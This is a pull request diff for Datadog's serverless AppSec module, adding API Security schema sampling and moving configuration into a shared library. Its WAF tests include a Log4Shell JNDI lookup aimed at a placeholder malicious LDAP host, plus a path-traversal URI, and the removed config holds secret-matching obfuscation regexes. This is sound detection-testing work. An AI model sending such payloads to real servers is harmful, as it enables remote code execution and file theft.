### PR TITLE
serverless/appsec: API Security

### DIFF
--- a/go.mod
+++ b/go.mod
@@ -71,7 +71,7 @@ require (
 	code.cloudfoundry.org/garden v0.0.0-20210208153517-580cadd489d2
 	code.cloudfoundry.org/lager v2.0.0+incompatible
 	github.com/CycloneDX/cyclonedx-go v0.7.2
-	github.com/DataDog/appsec-internal-go v1.1.0
+	github.com/DataDog/appsec-internal-go v1.2.0
 	github.com/DataDog/datadog-agent/pkg/gohai v0.50.0-rc.4
 	github.com/DataDog/datadog-agent/pkg/obfuscate v0.50.0-rc.4
 	github.com/DataDog/datadog-agent/pkg/remoteconfig/state v0.50.0-rc.4

--- a/go.mod
+++ b/go.mod
@@ -71,7 +71,7 @@ require (
 	code.cloudfoundry.org/garden v0.0.0-20210208153517-580cadd489d2
 	code.cloudfoundry.org/lager v2.0.0+incompatible
 	github.com/CycloneDX/cyclonedx-go v0.7.2
-	github.com/DataDog/appsec-internal-go v1.0.2
+	github.com/DataDog/appsec-internal-go v1.1.0
 	github.com/DataDog/datadog-agent/pkg/gohai v0.50.0-rc.4
 	github.com/DataDog/datadog-agent/pkg/obfuscate v0.50.0-rc.4
 	github.com/DataDog/datadog-agent/pkg/remoteconfig/state v0.50.0-rc.4

--- a/go.sum
+++ b/go.sum
@@ -121,8 +121,8 @@ github.com/DATA-DOG/go-sqlmock v1.5.0 h1:Shsta01QNfFxHCfpW6YH2STWB0MudeXXEWMr20O
 github.com/DATA-DOG/go-sqlmock v1.5.0/go.mod h1:f/Ixk793poVmq4qj/V1dPUg2JEAKC73Q5eFN3EC/SaM=
 github.com/DataDog/agent-payload/v5 v5.0.100 h1:mslyqwtKyTikNyeqITv6ynd1kZ1uMemEMx5TXlPQ/i8=
 github.com/DataDog/agent-payload/v5 v5.0.100/go.mod h1:COngtbYYCncpIPiE5D93QlXDH/3VAKk10jDNwGHcMRE=
-github.com/DataDog/appsec-internal-go v1.1.0 h1:bGRfjfUWxgKYtPhjiQw0gG7NiHABEdlBhXFjAsT0gZI=
-github.com/DataDog/appsec-internal-go v1.1.0/go.mod h1:PkBD/ntZ2hVq1CxGnewj1FbqaPj7vIa4ooBQfkI8FKQ=
+github.com/DataDog/appsec-internal-go v1.2.0 h1:474GrMsIfgO05pYtuhixSIQWmQoGIA7PDG0RqceQ74w=
+github.com/DataDog/appsec-internal-go v1.2.0/go.mod h1:PkBD/ntZ2hVq1CxGnewj1FbqaPj7vIa4ooBQfkI8FKQ=
 github.com/DataDog/aptly v1.5.3 h1:oLsRvjuXSVM4ia0N83dU3KiQeiJ6BaszYbTZOkSfDlw=
 github.com/DataDog/aptly v1.5.3/go.mod h1:ZL5TfCso+z4enH03N+s3z8tYUJHhL6DlxIvnnP2TbY4=
 github.com/DataDog/cast v1.3.1-0.20190301154711-1ee8c8bd14a3 h1:SobA9WYm4K/MUtWlbKaomWTmnuYp1KhIm8Wlx3vmpsg=

--- a/go.sum
+++ b/go.sum
@@ -121,8 +121,8 @@ github.com/DATA-DOG/go-sqlmock v1.5.0 h1:Shsta01QNfFxHCfpW6YH2STWB0MudeXXEWMr20O
 github.com/DATA-DOG/go-sqlmock v1.5.0/go.mod h1:f/Ixk793poVmq4qj/V1dPUg2JEAKC73Q5eFN3EC/SaM=
 github.com/DataDog/agent-payload/v5 v5.0.100 h1:mslyqwtKyTikNyeqITv6ynd1kZ1uMemEMx5TXlPQ/i8=
 github.com/DataDog/agent-payload/v5 v5.0.100/go.mod h1:COngtbYYCncpIPiE5D93QlXDH/3VAKk10jDNwGHcMRE=
-github.com/DataDog/appsec-internal-go v1.0.2 h1:Z+YWPlkQN+324zIk+BzKlPA1/6guKgGmYbON1/xU7gM=
-github.com/DataDog/appsec-internal-go v1.0.2/go.mod h1:+Y+4klVWKPOnZx6XESG7QHydOaUGEXyH2j/vSg9JiNM=
+github.com/DataDog/appsec-internal-go v1.1.0 h1:bGRfjfUWxgKYtPhjiQw0gG7NiHABEdlBhXFjAsT0gZI=
+github.com/DataDog/appsec-internal-go v1.1.0/go.mod h1:PkBD/ntZ2hVq1CxGnewj1FbqaPj7vIa4ooBQfkI8FKQ=
 github.com/DataDog/aptly v1.5.3 h1:oLsRvjuXSVM4ia0N83dU3KiQeiJ6BaszYbTZOkSfDlw=
 github.com/DataDog/aptly v1.5.3/go.mod h1:ZL5TfCso+z4enH03N+s3z8tYUJHhL6DlxIvnnP2TbY4=
 github.com/DataDog/cast v1.3.1-0.20190301154711-1ee8c8bd14a3 h1:SobA9WYm4K/MUtWlbKaomWTmnuYp1KhIm8Wlx3vmpsg=

--- a/pkg/serverless/appsec/appsec.go
+++ b/pkg/serverless/appsec/appsec.go
@@ -110,11 +110,11 @@ func (a *AppSec) Close() error {
 
 // Monitor runs the security event rules and return the events as a slice
 // The monitored addresses are all persistent addresses
-func (a *AppSec) Monitor(addresses map[string]any) (res waf.Result) {
+func (a *AppSec) Monitor(addresses map[string]any) *waf.Result {
 	log.Debugf("appsec: monitoring the request context %v", addresses)
 	ctx := waf.NewContext(a.handle)
 	if ctx == nil {
-		return res
+		return nil
 	}
 	defer ctx.Close()
 	timeout := a.cfg.WafTimeout
@@ -130,7 +130,7 @@ func (a *AppSec) Monitor(addresses map[string]any) (res waf.Result) {
 			log.Debugf("appsec: waf timeout value of %s reached", timeout)
 		} else {
 			log.Errorf("appsec: unexpected waf execution error: %v", err)
-			return res
+			return nil
 		}
 	}
 
@@ -140,9 +140,9 @@ func (a *AppSec) Monitor(addresses map[string]any) (res waf.Result) {
 	}
 	if !a.eventsRateLimiter.Allow() {
 		log.Debugf("appsec: security events discarded: the rate limit of %d events/s is reached", a.cfg.TraceRateLimit)
-		res = waf.Result{}
+		return nil
 	}
-	return res
+	return &res
 }
 
 // wafHealth is a simple test helper that returns the same thing as `waf.Health`

--- a/pkg/serverless/appsec/appsec.go
+++ b/pkg/serverless/appsec/appsec.go
@@ -12,7 +12,6 @@ import (
 	"math/rand"
 	"time"
 
-	"github.com/DataDog/appsec-internal-go/appsec"
 	"github.com/DataDog/datadog-agent/pkg/serverless/appsec/config"
 	"github.com/DataDog/datadog-agent/pkg/serverless/appsec/httpsec"
 	"github.com/DataDog/datadog-agent/pkg/serverless/proxy"
@@ -79,13 +78,10 @@ func newAppSec() (*AppSec, error) {
 	}
 
 	var rules map[string]any
-	ruleset, err := appsec.DefaultRuleset()
-	if err != nil {
+	if err := json.Unmarshal(cfg.Rules, &rules); err != nil {
 		return nil, err
 	}
-	if err := json.Unmarshal(ruleset, &rules); err != nil {
-		return nil, err
-	}
+
 	handle, err := waf.NewHandle(rules, cfg.Obfuscator.KeyRegex, cfg.Obfuscator.ValueRegex)
 	if err != nil {
 		return nil, err

--- a/pkg/serverless/appsec/appsec.go
+++ b/pkg/serverless/appsec/appsec.go
@@ -9,6 +9,7 @@ package appsec
 
 import (
 	"encoding/json"
+	"math/rand"
 	"time"
 
 	"github.com/DataDog/appsec-internal-go/appsec"
@@ -118,10 +119,10 @@ func (a *AppSec) Monitor(addresses map[string]any) (res waf.Result) {
 	defer ctx.Close()
 	timeout := a.cfg.WafTimeout
 
-	// Naive 10% sampling for API Security, disabled for testing
-	//	if rand.Uint32()%10 == 0 {
-	addresses["waf.context.processor"] = map[string]any{"extract-schema": true}
-	//	}
+	// Ask the WAF for schema reporting if API security is enabled
+	if config.APISecurityEnabled() && config.APISecuritySampleRate() >= rand.Float64() {
+		addresses["waf.context.processor"] = map[string]any{"extract-schema": true}
+	}
 
 	res, err := ctx.Run(waf.RunAddressData{Persistent: addresses}, timeout)
 	if err != nil {

--- a/pkg/serverless/appsec/appsec_test.go
+++ b/pkg/serverless/appsec/appsec_test.go
@@ -11,6 +11,7 @@ import (
 	"strconv"
 	"testing"
 
+	"github.com/DataDog/datadog-agent/pkg/serverless/appsec/config"
 	waf "github.com/DataDog/go-libddwaf/v2"
 
 	"github.com/stretchr/testify/require"
@@ -74,6 +75,9 @@ func TestMonitor(t *testing.T) {
 	})
 
 	t.Run("api-security", func(t *testing.T) {
+		t.Setenv("DD_API_SECURITY_REQUEST_SAMPLE_RATE", "1.0")
+		t.Setenv("DD_EXPERIMENTAL_API_SECURITY_ENABLED", "true")
+		config.Refresh()
 		for _, tc := range []struct {
 			name       string
 			pathParams map[string]any

--- a/pkg/serverless/appsec/appsec_test.go
+++ b/pkg/serverless/appsec/appsec_test.go
@@ -11,7 +11,6 @@ import (
 	"strconv"
 	"testing"
 
-	"github.com/DataDog/datadog-agent/pkg/serverless/appsec/config"
 	waf "github.com/DataDog/go-libddwaf/v2"
 
 	"github.com/stretchr/testify/require"
@@ -49,13 +48,13 @@ func TestMonitor(t *testing.T) {
 		t.Skip("host not supported by appsec", err)
 	}
 
-	t.Setenv("DD_SERVERLESS_APPSEC_ENABLED", "true")
-	t.Setenv("DD_APPSEC_WAF_TIMEOUT", "2s")
-	asm, err := newAppSec()
-	require.NoError(t, err)
-	require.Nil(t, err)
-
 	t.Run("events-detection", func(t *testing.T) {
+		t.Setenv("DD_SERVERLESS_APPSEC_ENABLED", "true")
+		t.Setenv("DD_APPSEC_WAF_TIMEOUT", "2s")
+		asm, err := newAppSec()
+		require.NoError(t, err)
+		defer asm.Close()
+
 		uri := "/path/to/resource/../../../../../database.yml.sqlite3"
 		addresses := map[string]interface{}{
 			"server.request.uri.raw": uri,
@@ -77,7 +76,11 @@ func TestMonitor(t *testing.T) {
 	t.Run("api-security", func(t *testing.T) {
 		t.Setenv("DD_API_SECURITY_REQUEST_SAMPLE_RATE", "1.0")
 		t.Setenv("DD_EXPERIMENTAL_API_SECURITY_ENABLED", "true")
-		config.Refresh()
+		t.Setenv("DD_SERVERLESS_APPSEC_ENABLED", "true")
+		t.Setenv("DD_APPSEC_WAF_TIMEOUT", "2s")
+		asm, err := newAppSec()
+		require.NoError(t, err)
+		defer asm.Close()
 		for _, tc := range []struct {
 			name       string
 			pathParams map[string]any

--- a/pkg/serverless/appsec/appsec_test.go
+++ b/pkg/serverless/appsec/appsec_test.go
@@ -69,8 +69,9 @@ func TestMonitor(t *testing.T) {
 			},
 			"server.request.body": "eyJ0ZXN0I${jndi:ldap://16.0.2.staging.malicious.server/a}joiYm9keSJ9",
 		}
-		events := asm.Monitor(addresses)
-		require.NotNil(t, events)
+		res := asm.Monitor(addresses)
+		require.NotNil(t, res)
+		require.True(t, res.HasEvents())
 	})
 
 	t.Run("api-security", func(t *testing.T) {
@@ -136,7 +137,8 @@ func TestMonitor(t *testing.T) {
 						"query": {"$http_server_vars"},
 					},
 				})
-				require.NotEmpty(t, res.Derivatives)
+				require.NotNil(t, res)
+				require.True(t, res.HasDerivatives())
 				schema, err := json.Marshal(res.Derivatives)
 				require.NoError(t, err)
 				require.Equal(t, tc.schema, string(schema))

--- a/pkg/serverless/appsec/appsec_test.go
+++ b/pkg/serverless/appsec/appsec_test.go
@@ -129,6 +129,13 @@ func TestMonitor(t *testing.T) {
 				},
 				schema: `{"_dd.appsec.s.req.params":[{"param":[[[2],[16],[4],[8]],{"len":4}]}],"_dd.appsec.s.req.query":[{"query":[[[8]],{"len":1}]}]}`,
 			},
+			{
+				name: "vin-scanner",
+				pathParams: map[string]any{
+					"vin": "AAAAAAAAAAAAAAAAA",
+				},
+				schema: `{"_dd.appsec.s.req.params":[{"vin":[8,{"category":"pii","type":"vin"}]}],"_dd.appsec.s.req.query":[{"query":[[[8]],{"len":1}]}]}`,
+			},
 		} {
 			t.Run(tc.name, func(t *testing.T) {
 				res := asm.Monitor(map[string]any{

--- a/pkg/serverless/appsec/config/config.go
+++ b/pkg/serverless/appsec/config/config.go
@@ -9,69 +9,35 @@ package config
 import (
 	"fmt"
 	"os"
-	"regexp"
 	"strconv"
 	"time"
-	"unicode"
-	"unicode/utf8"
 
 	"github.com/DataDog/appsec-internal-go/appsec"
-	"github.com/DataDog/datadog-agent/pkg/util/log"
 )
 
 const (
-	enabledEnvVar               = "DD_SERVERLESS_APPSEC_ENABLED"
-	rulesEnvVar                 = "DD_APPSEC_RULES"
-	wafTimeoutEnvVar            = "DD_APPSEC_WAF_TIMEOUT"
-	traceRateLimitEnvVar        = "DD_APPSEC_TRACE_RATE_LIMIT"
-	obfuscatorKeyEnvVar         = "DD_APPSEC_OBFUSCATION_PARAMETER_KEY_REGEXP"
-	obfuscatorValueEnvVar       = "DD_APPSEC_OBFUSCATION_PARAMETER_VALUE_REGEXP"
-	tracingEnabledEnvVar        = "DD_APM_TRACING_ENABLED"
-	apiSecurityEnabledEnvVar    = "DD_EXPERIMENTAL_API_SECURITY_ENABLED"
-	apiSecuritySampleRateEnvVar = "DD_API_SECURITY_REQUEST_SAMPLE_RATE"
+	enabledEnvVar        = "DD_SERVERLESS_APPSEC_ENABLED"
+	tracingEnabledEnvVar = "DD_APM_TRACING_ENABLED"
 )
 
-const (
-	defaultAPISecSampleRate     = 10. / 100
-	defaultWAFTimeout           = 4 * time.Millisecond
-	defaultTraceRate            = 100 // up to 100 appsec traces/s
-	defaultObfuscatorKeyRegex   = `(?i)(?:p(?:ass)?w(?:or)?d|pass(?:_?phrase)?|secret|(?:api_?|private_?|public_?)key)|token|consumer_?(?:id|key|secret)|sign(?:ed|ature)|bearer|authorization`
-	defaultObfuscatorValueRegex = `(?i)(?:p(?:ass)?w(?:or)?d|pass(?:_?phrase)?|secret|(?:api_?|private_?|public_?|access_?|secret_?)key(?:_?id)?|token|consumer_?(?:id|key|secret)|sign(?:ed|ature)?|auth(?:entication|orization)?)(?:\s*=[^;]|"\s*:\s*"[^"]+")|bearer\s+[a-z0-9\._\-]+|token:[a-z0-9]{13}|gh[opsu]_[0-9a-zA-Z]{36}|ey[I-L][\w=-]+\.ey[I-L][\w=-]+(?:\.[\w.+\/=-]+)?|[\-]{5}BEGIN[a-z\s]+PRIVATE\sKEY[\-]{5}[^\-]+[\-]{5}END[a-z\s]+PRIVATE\sKEY|ssh-rsa\s*[a-z0-9\/\.+]{100,}`
-)
+var standalone bool
 
 // StartOption is used to customize the AppSec configuration when invoked with appsec.Start()
 type StartOption func(c *Config)
 
 // Config is the AppSec configuration.
 type Config struct {
-	// rules loaded via the env var DD_APPSEC_RULES. When not set, the builtin rules will be used.
+	// Rules is the security rules loaded via the env var DD_APPSEC_RULES.
+	// When not set, the builtin rules will be used.
 	Rules []byte
-	// Maximum WAF execution time
+	// WafTimeout is the maximum WAF execution time
 	WafTimeout time.Duration
-	// AppSec trace rate limit (traces per second).
+	// TraceRateLimit is the rate limit of AppSec traces (per second).
 	TraceRateLimit uint
-	// Obfuscator configuration parameters
-	Obfuscator ObfuscatorConfig
-}
-
-// ObfuscatorConfig wraps the key and value regexp to be passed to the WAF to perform obfuscation.
-type ObfuscatorConfig struct {
-	KeyRegex   string
-	ValueRegex string
-}
-
-// Config variables assigned at init by reading the environment
-var (
-	apiSecEnabled    bool
-	apiSecSampleRate float64
-	standalone       bool
-)
-
-// Refresh updates the configuration by reading from the environment
-func Refresh() {
-	standalone = isStandalone()
-	apiSecEnabled = apiSecurityEnabled()
-	apiSecSampleRate = apiSecuritySampleRate()
+	// Obfuscator is the configuration for sensitive data obfuscation (in-WAF)
+	Obfuscator appsec.ObfuscatorConfig
+	// APISec is the configuration for API Security schema collection
+	APISec appsec.APISecConfig
 }
 
 // IsEnabled returns true when appsec is enabled when the environment variable
@@ -93,118 +59,19 @@ func IsStandalone() bool {
 	return standalone
 }
 
-// APISecurityEnabled returns whether API security is enabled through the environment
-func APISecurityEnabled() bool {
-	return apiSecEnabled
-}
-
-// APISecuritySampleRate returns the sample rate for API Security schema collection, read from the env
-func APISecuritySampleRate() float64 {
-	return apiSecSampleRate
-}
-
 // NewConfig returns a new appsec configuration read from the environment
 func NewConfig() (*Config, error) {
-	rules, err := readRulesConfig()
+	rules, err := appsec.RulesFromEnv()
 	if err != nil {
 		return nil, err
 	}
 	return &Config{
 		Rules:          rules,
-		WafTimeout:     readWAFTimeoutConfig(),
-		TraceRateLimit: readRateLimitConfig(),
-		Obfuscator:     readObfuscatorConfig(),
+		WafTimeout:     appsec.WAFTimeoutFromEnv(),
+		TraceRateLimit: appsec.RateLimitFromEnv(),
+		Obfuscator:     appsec.NewObfuscatorConfig(),
+		APISec:         appsec.NewAPISecConfig(),
 	}, nil
-}
-
-func readWAFTimeoutConfig() (timeout time.Duration) {
-	timeout = defaultWAFTimeout
-	value := os.Getenv(wafTimeoutEnvVar)
-	if value == "" {
-		return
-	}
-
-	// Check if the value ends with a letter, which means the user has
-	// specified their own time duration unit(s) such as 1s200ms.
-	// Otherwise, default to microseconds.
-	if lastRune, _ := utf8.DecodeLastRuneInString(value); !unicode.IsLetter(lastRune) {
-		value += "us" // Add the default microsecond time-duration suffix
-	}
-
-	parsed, err := time.ParseDuration(value)
-	if err != nil {
-		logEnvVarParsingError(wafTimeoutEnvVar, value, err, timeout)
-		return
-	}
-	if parsed <= 0 {
-		logUnexpectedEnvVarValue(wafTimeoutEnvVar, parsed, "expecting a strictly positive duration", timeout)
-		return
-	}
-	return parsed
-}
-
-func readRateLimitConfig() (rate uint) {
-	rate = defaultTraceRate
-	value := os.Getenv(traceRateLimitEnvVar)
-	if value == "" {
-		return rate
-	}
-	parsed, err := strconv.ParseUint(value, 10, 0)
-	if err != nil {
-		logEnvVarParsingError(traceRateLimitEnvVar, value, err, rate)
-		return
-	}
-	if rate == 0 {
-		logUnexpectedEnvVarValue(traceRateLimitEnvVar, parsed, "expecting a value strictly greater than 0", rate)
-		return
-	}
-	return uint(parsed)
-}
-
-func readObfuscatorConfig() ObfuscatorConfig {
-	keyRE := readObfuscatorConfigRegexp(obfuscatorKeyEnvVar, defaultObfuscatorKeyRegex)
-	valueRE := readObfuscatorConfigRegexp(obfuscatorValueEnvVar, defaultObfuscatorValueRegex)
-	return ObfuscatorConfig{KeyRegex: keyRE, ValueRegex: valueRE}
-}
-
-func readObfuscatorConfigRegexp(name, defaultValue string) string {
-	val, present := os.LookupEnv(name)
-	if !present {
-		log.Debugf("appsec: %s not defined, starting with the default obfuscator regular expression", name)
-		return defaultValue
-	}
-	if _, err := regexp.Compile(val); err != nil {
-		log.Errorf("appsec: could not compile the configured obfuscator regular expression `%s=%s`. Using the default value instead", name, val)
-		return defaultValue
-	}
-	log.Debugf("appsec: starting with the configured obfuscator regular expression %s", name)
-	return val
-}
-
-func readRulesConfig() (rules []byte, err error) {
-	rules = []byte(appsec.StaticRecommendedRules)
-	filepath := os.Getenv(rulesEnvVar)
-	if filepath == "" {
-		log.Info("appsec: starting with the default recommended security rules")
-		return rules, nil
-	}
-	buf, err := os.ReadFile(filepath)
-	if err != nil {
-		if os.IsNotExist(err) {
-			log.Errorf("appsec: could not find the rules file in path %s: %v.", filepath, err)
-		}
-		return nil, err
-	}
-	log.Info("appsec: starting with the security rules from file %s", filepath)
-	return buf, nil
-}
-
-func logEnvVarParsingError(name, value string, err error, defaultValue interface{}) {
-	log.Errorf("appsec: could not parse the env var %s=%s as a duration: %v. Using default value %v.", name, value, err, defaultValue)
-}
-
-func logUnexpectedEnvVarValue(name string, value interface{}, reason string, defaultValue interface{}) {
-	log.Errorf("appsec: unexpected configuration value of %s=%v: %s. Using default value %v.", name, value, reason, defaultValue)
 }
 
 // isStandalone is reads the env and reports whether appsec runs in standalone mode
@@ -215,24 +82,6 @@ func isStandalone() bool {
 	return set && !enabled
 }
 
-func apiSecurityEnabled() bool {
-	enabled, _ := strconv.ParseBool(os.Getenv(apiSecurityEnabledEnvVar))
-	return enabled
-}
-
-func apiSecuritySampleRate() float64 {
-	rate, err := strconv.ParseFloat(os.Getenv(apiSecuritySampleRateEnvVar), 64)
-	if err != nil {
-		log.Debugf("appsec: could not parse %s. Defaulting to %f", apiSecuritySampleRateEnvVar, defaultAPISecSampleRate)
-		return defaultAPISecSampleRate
-	}
-	if rate < 0. || rate > 1. {
-		log.Debugf("appsec: %s value must be between 0 and 1. Defaulting to %f", apiSecuritySampleRateEnvVar, defaultAPISecSampleRate)
-		return defaultAPISecSampleRate
-	}
-	return rate
-}
-
 func init() {
-	Refresh()
+	standalone = isStandalone()
 }

--- a/pkg/serverless/appsec/config/config_test.go
+++ b/pkg/serverless/appsec/config/config_test.go
@@ -6,11 +6,8 @@
 package config
 
 import (
-	"os"
-	"testing"
-	"time"
-
 	"github.com/DataDog/appsec-internal-go/appsec"
+	"testing"
 
 	"github.com/stretchr/testify/require"
 )
@@ -18,233 +15,63 @@ import (
 func TestConfig(t *testing.T) {
 	expectedDefaultConfig := &Config{
 		Rules:          []byte(appsec.StaticRecommendedRules),
-		WafTimeout:     defaultWAFTimeout,
-		TraceRateLimit: defaultTraceRate,
-		Obfuscator: ObfuscatorConfig{
-			KeyRegex:   defaultObfuscatorKeyRegex,
-			ValueRegex: defaultObfuscatorValueRegex,
-		},
+		WafTimeout:     appsec.WAFTimeoutFromEnv(),
+		TraceRateLimit: appsec.RateLimitFromEnv(),
+		Obfuscator:     appsec.NewObfuscatorConfig(),
+		APISec:         appsec.NewAPISecConfig(),
 	}
 
 	t.Run("default", func(t *testing.T) {
-		restoreEnv := cleanEnv()
-		defer restoreEnv()
 		cfg, err := NewConfig()
 		require.NoError(t, err)
 		require.Equal(t, expectedDefaultConfig, cfg)
 	})
 
-	t.Run("waf-timeout", func(t *testing.T) {
-		t.Run("parsable", func(t *testing.T) {
-			expCfg := *expectedDefaultConfig
-			expCfg.WafTimeout = 5 * time.Second
-			restoreEnv := cleanEnv()
-			defer restoreEnv()
-			require.NoError(t, os.Setenv(wafTimeoutEnvVar, "5s"))
-			cfg, err := NewConfig()
-			require.NoError(t, err)
-			require.Equal(t, &expCfg, cfg)
-		})
-
-		t.Run("parsable-default-microsecond", func(t *testing.T) {
-			expCfg := *expectedDefaultConfig
-			expCfg.WafTimeout = 1 * time.Microsecond
-			restoreEnv := cleanEnv()
-			defer restoreEnv()
-			require.NoError(t, os.Setenv(wafTimeoutEnvVar, "1"))
-			cfg, err := NewConfig()
-			require.NoError(t, err)
-			require.Equal(t, &expCfg, cfg)
-		})
-
-		t.Run("not-parsable", func(t *testing.T) {
-			restoreEnv := cleanEnv()
-			defer restoreEnv()
-			require.NoError(t, os.Setenv(wafTimeoutEnvVar, "not a duration string"))
-			cfg, err := NewConfig()
-			require.NoError(t, err)
-			require.Equal(t, expectedDefaultConfig, cfg)
-		})
-
-		t.Run("negative", func(t *testing.T) {
-			restoreEnv := cleanEnv()
-			defer restoreEnv()
-			require.NoError(t, os.Setenv(wafTimeoutEnvVar, "-1s"))
-			cfg, err := NewConfig()
-			require.NoError(t, err)
-			require.Equal(t, expectedDefaultConfig, cfg)
-		})
-
-		t.Run("zero", func(t *testing.T) {
-			restoreEnv := cleanEnv()
-			defer restoreEnv()
-			require.NoError(t, os.Setenv(wafTimeoutEnvVar, "0"))
-			cfg, err := NewConfig()
-			require.NoError(t, err)
-			require.Equal(t, expectedDefaultConfig, cfg)
-		})
-
-		t.Run("empty-string", func(t *testing.T) {
-			restoreEnv := cleanEnv()
-			defer restoreEnv()
-			require.NoError(t, os.Setenv(wafTimeoutEnvVar, ""))
-			cfg, err := NewConfig()
-			require.NoError(t, err)
-			require.Equal(t, expectedDefaultConfig, cfg)
-		})
-	})
-
-	t.Run("rules", func(t *testing.T) {
-		t.Run("empty-string", func(t *testing.T) {
-			restoreEnv := cleanEnv()
-			defer restoreEnv()
-			os.Setenv(rulesEnvVar, "")
-			cfg, err := NewConfig()
-			require.NoError(t, err)
-			require.Equal(t, expectedDefaultConfig, cfg)
-		})
-
-		t.Run("file-not-found", func(t *testing.T) {
-			restoreEnv := cleanEnv()
-			defer restoreEnv()
-			os.Setenv(rulesEnvVar, "i do not exist")
-			cfg, err := NewConfig()
-			require.Error(t, err)
-			require.Nil(t, cfg)
-		})
-
-		t.Run("local-file", func(t *testing.T) {
-			restoreEnv := cleanEnv()
-			defer restoreEnv()
-			file, err := os.CreateTemp("", "example-*")
-			require.NoError(t, err)
-			defer func() {
-				file.Close()
-				os.Remove(file.Name())
-			}()
-			expectedRules := `custom rule file content`
-			expCfg := *expectedDefaultConfig
-			expCfg.Rules = []byte(expectedRules)
-			_, err = file.WriteString(expectedRules)
-			require.NoError(t, err)
-			os.Setenv(rulesEnvVar, file.Name())
-			cfg, err := NewConfig()
-			require.NoError(t, err)
-			require.Equal(t, &expCfg, cfg)
-		})
-	})
-
-	t.Run("trace-rate-limit", func(t *testing.T) {
-		t.Run("parsable", func(t *testing.T) {
-			expCfg := *expectedDefaultConfig
-			expCfg.TraceRateLimit = 1234567890
-			restoreEnv := cleanEnv()
-			defer restoreEnv()
-			require.NoError(t, os.Setenv(traceRateLimitEnvVar, "1234567890"))
-			cfg, err := NewConfig()
-			require.NoError(t, err)
-			require.Equal(t, &expCfg, cfg)
-		})
-
-		t.Run("not-parsable", func(t *testing.T) {
-			restoreEnv := cleanEnv()
-			defer restoreEnv()
-			require.NoError(t, os.Setenv(wafTimeoutEnvVar, "not a uint"))
-			cfg, err := NewConfig()
-			require.NoError(t, err)
-			require.Equal(t, expectedDefaultConfig, cfg)
-		})
-
-		t.Run("negative", func(t *testing.T) {
-			restoreEnv := cleanEnv()
-			defer restoreEnv()
-			require.NoError(t, os.Setenv(wafTimeoutEnvVar, "-1"))
-			cfg, err := NewConfig()
-			require.NoError(t, err)
-			require.Equal(t, expectedDefaultConfig, cfg)
-		})
-
-		t.Run("zero", func(t *testing.T) {
-			restoreEnv := cleanEnv()
-			defer restoreEnv()
-			require.NoError(t, os.Setenv(wafTimeoutEnvVar, "0"))
-			cfg, err := NewConfig()
-			require.NoError(t, err)
-			require.Equal(t, expectedDefaultConfig, cfg)
-		})
-
-		t.Run("empty-string", func(t *testing.T) {
-			restoreEnv := cleanEnv()
-			defer restoreEnv()
-			require.NoError(t, os.Setenv(wafTimeoutEnvVar, ""))
-			cfg, err := NewConfig()
-			require.NoError(t, err)
-			require.Equal(t, expectedDefaultConfig, cfg)
-		})
-	})
-
-	t.Run("obfuscator", func(t *testing.T) {
-		t.Run("key-regexp", func(t *testing.T) {
-			t.Run("env-var-normal", func(t *testing.T) {
-				expCfg := *expectedDefaultConfig
-				expCfg.Obfuscator.KeyRegex = "test"
-				restoreEnv := cleanEnv()
-				defer restoreEnv()
-				require.NoError(t, os.Setenv(obfuscatorKeyEnvVar, "test"))
-				cfg, err := NewConfig()
-				require.NoError(t, err)
-				require.Equal(t, &expCfg, cfg)
+	t.Run("appsec", func(t *testing.T) {
+		for _, tc := range []struct {
+			name    string
+			env     string
+			enabled bool
+		}{
+			{
+				name: "default",
+			},
+			{
+				name: "enabled: 0",
+				env:  "0",
+			},
+			{
+				name: "enabled: false",
+				env:  "false",
+			},
+			{
+				name: "enabled: -1",
+				env:  "-1",
+			},
+			{
+				name: "enabled: junk data",
+				env:  "junk data",
+			},
+			{
+				name:    "enabled: 1",
+				env:     "1",
+				enabled: true,
+			},
+			{
+				name:    "enabled: true",
+				env:     "1",
+				enabled: true,
+			},
+		} {
+			t.Run(tc.name, func(t *testing.T) {
+				t.Setenv(enabledEnvVar, tc.env)
+				enabled, _, err := IsEnabled()
+				if tc.enabled {
+					require.NoError(t, err)
+				}
+				require.Equal(t, tc.enabled, enabled)
 			})
-			t.Run("env-var-empty", func(t *testing.T) {
-				expCfg := *expectedDefaultConfig
-				expCfg.Obfuscator.KeyRegex = ""
-				restoreEnv := cleanEnv()
-				defer restoreEnv()
-				require.NoError(t, os.Setenv(obfuscatorKeyEnvVar, ""))
-				cfg, err := NewConfig()
-				require.NoError(t, err)
-				require.Equal(t, &expCfg, cfg)
-			})
-			t.Run("compile-error", func(t *testing.T) {
-				restoreEnv := cleanEnv()
-				defer restoreEnv()
-				require.NoError(t, os.Setenv(obfuscatorKeyEnvVar, "+"))
-				cfg, err := NewConfig()
-				require.NoError(t, err)
-				require.Equal(t, expectedDefaultConfig, cfg)
-			})
-		})
-
-		t.Run("value-regexp", func(t *testing.T) {
-			t.Run("env-var-normal", func(t *testing.T) {
-				expCfg := *expectedDefaultConfig
-				expCfg.Obfuscator.ValueRegex = "test"
-				restoreEnv := cleanEnv()
-				defer restoreEnv()
-				require.NoError(t, os.Setenv(obfuscatorValueEnvVar, "test"))
-				cfg, err := NewConfig()
-				require.NoError(t, err)
-				require.Equal(t, &expCfg, cfg)
-			})
-			t.Run("env-var-empty", func(t *testing.T) {
-				expCfg := *expectedDefaultConfig
-				expCfg.Obfuscator.ValueRegex = ""
-				restoreEnv := cleanEnv()
-				defer restoreEnv()
-				require.NoError(t, os.Setenv(obfuscatorValueEnvVar, ""))
-				cfg, err := NewConfig()
-				require.NoError(t, err)
-				require.Equal(t, &expCfg, cfg)
-			})
-			t.Run("compile-error", func(t *testing.T) {
-				restoreEnv := cleanEnv()
-				defer restoreEnv()
-				require.NoError(t, os.Setenv(obfuscatorValueEnvVar, "+"))
-				cfg, err := NewConfig()
-				require.NoError(t, err)
-				require.Equal(t, expectedDefaultConfig, cfg)
-			})
-		})
+		}
 	})
 
 	t.Run("standalone", func(t *testing.T) {
@@ -281,106 +108,11 @@ func TestConfig(t *testing.T) {
 			},
 		} {
 			t.Run(tc.name, func(t *testing.T) {
-				restoreEnv := cleanEnv()
-				defer restoreEnv()
-				// This is what happens at init() in config.go
 				if tc.env != "" {
-					require.NoError(t, os.Setenv(tracingEnabledEnvVar, tc.env))
+					t.Setenv(tracingEnabledEnvVar, tc.env)
 				}
-				Refresh()
-				require.Equal(t, tc.standalone, IsStandalone())
+				require.Equal(t, tc.standalone, isStandalone())
 			})
 		}
-
 	})
-
-	t.Run("api security", func(t *testing.T) {
-		for _, tc := range []struct {
-			name          string
-			enabledVar    string
-			sampleRateVar string
-			enabled       bool
-			sampleRate    float64
-		}{
-			{
-				name:       "disabled",
